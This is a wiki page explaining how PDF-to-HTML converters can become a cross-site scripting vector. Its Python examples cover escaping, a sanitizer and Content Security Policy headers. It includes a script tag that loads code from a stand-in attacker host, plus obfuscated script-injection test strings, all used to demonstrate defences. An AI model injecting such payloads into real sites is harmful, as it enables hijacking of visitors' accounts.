
Protecting PDF2HTML from Cross Site Scripting

Stephen A Thomas edited this page Nov 25, 2013 · 2 revisions

In most common deployments, tools that convert PDF files to HTML content can expose a vector for cross site scripting attacks. This document briefly explains that attack vector and outlines some approaches to protecting against it.

Cross Site Scripting Attacks

Web sites may be vulnerable to cross site scripting (XSS) attacks whenever they accept user-supplied content that is later rendered as HTML for other users. If a vulnerability exists, a malicious user (the attacker) can include active content (e.g., JavaScript) in a contribution. When another user (the victim) views that content, the included script executes and performs malicious actions within the context of that user.

The classic XSS example is a simple comment form:

If the web server naively accepts the contents of the <textarea> and renders them as HTML in the page, an attacker can embed a JavaScript reference:

When the victim later views the post and its comments, the browser will load and execute badscript.js, and that script will run with the same access to the page that the victim has. With that access, the script could, for example, change the victim's registered email address to one that the attacker controls and then request a password reset, giving the attacker complete control over the victim's account.
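The difference between the vulnerable and the safe handling of a comment can be sketched in a few lines. This is a minimal illustration in Python rather than a reconstruction of any particular server: the template, the function names, and the attacker.example URL are all hypothetical.

```python
from html import escape

# Hypothetical page fragment into which a submitted comment is placed.
COMMENT_TEMPLATE = '<div class="comment">{body}</div>'


def render_comment_naive(comment: str) -> str:
    """Vulnerable: the submitted text is inserted into the page verbatim."""
    return COMMENT_TEMPLATE.format(body=comment)


def render_comment_escaped(comment: str) -> str:
    """Safer: HTML metacharacters are escaped, so the browser shows text."""
    return COMMENT_TEMPLATE.format(body=escape(comment))


# Hypothetical attacker input, modeled on the badscript.js scenario.
payload = '<script src="https://attacker.example/badscript.js"></script>'

if __name__ == "__main__":
    print(render_comment_naive(payload))    # contains a live <script> element
    print(render_comment_escaped(payload))  # contains only inert text
```

With the naive renderer the victim's browser would fetch and run the referenced script; with the escaped renderer the same input is displayed as literal text.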

PDF2HTML as an XSS Vector

Tools that convert PDF files to HTML represent a more complex form of the classic comment form attack vector. A (potentially malicious) user supplies content in the form of a PDF file. The tool converts the contents of that file into HTML, and other users who view the rendered HTML could become victims of an XSS attack.

PDF2HTML tools are more complex than simple comment forms because the transformation from user-supplied content to rendered output is complicated. The potential for such attacks, however, remains. Exploits against PDF2HTML tools might include:

  • Including <script> tags in the PDF content. Most PDF2HTML tools are likely to detect and "HTML-escape" the obvious <script> tags in the standard PDF content. There are, however, at least 70 different ways to obfuscate the <script> tag, not all of which may be detected by the PDF2HTML application. (A trivial example of such obfuscation is the URL-encoded form %3cscript%3e.)

  • Referencing External Content. PDF files include a mechanism for referencing external content (much like the HTML <img> tag). Depending on how the PDF2HTML tool converts those external references to HTML, it may be possible for an attacker to use such a reference to create an external HTML link to attack code.

  • PDF Metadata. PDF files contain information that is not strictly content; however, various PDF2HTML tools may attempt to render such metadata as HTML tags. Depending on the specific tool, that feature may let attackers execute XSS attacks by carefully crafting PDF metadata.

  • Defects in the PDF2HTML Tool. The PDF2HTML tools are themselves software applications, and as such they may include defects. Such defects could allow an attacker to craft specific PDF content that would circumvent any XSS protections in the PDF2HTML code. Buffer overflows are classic examples of such exploits.
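The obfuscation problem from the first item above can be illustrated with a deliberately weak filter. The sketch below is hypothetical and does not describe how any real PDF2HTML tool works: it assumes a filter that strips only the literal lowercase <script> tag, and a later processing stage that URL-decodes the text.

```python
import re
from html import escape
from urllib.parse import unquote


def naive_blocklist_filter(text: str) -> str:
    """Hypothetical weak filter: removes only the exact lowercase tags."""
    return text.replace("<script>", "").replace("</script>", "")


def contains_raw_tag(markup: str) -> bool:
    """True if the markup still contains something a browser parses as a tag."""
    return re.search(r"<\s*/?\s*[a-zA-Z]", markup) is not None


# Three inputs the weak filter does not recognize.
samples = [
    "<SCRIPT>alert(1)</SCRIPT>",           # different letter case
    '<img src="x" onerror="alert(1)">',    # script in an event handler
    "%3cscript%3ealert(1)%3c/script%3e",   # URL-encoded angle brackets
]

if __name__ == "__main__":
    for sample in samples:
        filtered = naive_blocklist_filter(sample)
        decoded = unquote(filtered)  # assumed later URL-decoding stage
        print(contains_raw_tag(decoded), contains_raw_tag(escape(decoded)))
```

All three samples pass through the blocklist with their markup intact, while escaping the fully decoded text leaves no raw tags. The order matters in this sketch: escaping is applied after decoding, so nothing can be decoded back into markup afterward.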

Sanitizing PDF2HTML Output

One way to protect against XSS attacks through PDF2HTML tools is to "sanitize" the HTML content that the tool generates before rendering it in (or even delivering it to) the browser. Servers based on Node.js, for example, could pass the HTML output through one of the following two libraries:

Of course, those tools may themselves have exploitable defects, but the extra layer of protection they add is significant. It is also noteworthy that the foundation for the latter tool was developed by security experts at Google specifically to protect against XSS (and other) web-based attacks.
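To make the idea of sanitizing concrete, here is a minimal allowlist sanitizer sketched with Python's standard html.parser module. It is not one of the libraries referred to above and is far less thorough than a maintained sanitizer; the allowed tags, attributes, and URL schemes are assumptions chosen only for illustration.

```python
from html import escape
from html.parser import HTMLParser

# Assumed allowlists; a real deployment would tune these to its converter.
ALLOWED_TAGS = {"p", "div", "span", "b", "i", "em", "strong", "br", "img", "a"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}}
SAFE_SCHEMES = ("http://", "https://")
VOID_TAGS = {"br", "img"}
DROP_CONTENT = {"script", "style"}  # drop these tags and their contents


class AllowlistSanitizer(HTMLParser):
    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []
        self.skip_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops onclick, onerror, style, and so on
            value = (value or "").strip()
            if name in ("href", "src") and not value.lower().startswith(SAFE_SCHEMES):
                continue  # drops javascript: and other unexpected schemes
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data))  # text is always re-escaped


def sanitize(html_text: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(html_text)
    parser.close()
    return "".join(parser.out)
```

The design choice worth noting is that the sanitizer rebuilds the output from an allowlist instead of searching the input for known-bad patterns, so unrecognized tags and attributes are dropped by default.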

Content Security Policy

The ultimate protection against cross site scripting (regardless of the attack vector) is for the web site to implement Content Security Policy (CSP). As of this writing, browser support for CSP is not universal, so it would be premature to rely exclusively on CSP. Also, CSP places some significant constraints on the normal content that a web site delivers, so migrating a web site to CSP may be a non-trivial task. CSP can be enabled in a "report only" mode, however. Sites that intend to deploy CSP eventually may see substantial benefit in using this mode for an interim period to identify required changes to their content. This interim period can be useful even without universal browser support for the policy.
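As a rough sketch of how the two modes differ on the wire, the following minimal WSGI application attaches a policy to its response. The policy string, the /csp-report endpoint, and the function names are assumptions for illustration; only the two header names and the directive names come from the CSP standard.

```python
# Assumed example policy: allow resources only from the site's own origin
# and send violation reports to a hypothetical /csp-report endpoint.
POLICY = "default-src 'self'; script-src 'self'; report-uri /csp-report"


def csp_header(report_only: bool = True) -> tuple[str, str]:
    """Return the header for report-only mode or for full enforcement."""
    name = (
        "Content-Security-Policy-Report-Only"
        if report_only
        else "Content-Security-Policy"
    )
    return (name, POLICY)


def app(environ, start_response):
    """Minimal WSGI app that serves a page with a report-only policy."""
    body = b"<p>converted PDF content would go here</p>"
    headers = [
        ("Content-Type", "text/html; charset=utf-8"),
        csp_header(report_only=True),
    ]
    start_response("200 OK", headers)
    return [body]
```

In report-only mode the browser reports violations but still loads the offending content, which is what makes the interim period useful for finding required changes. Switching to enforcement is then a matter of changing the header name.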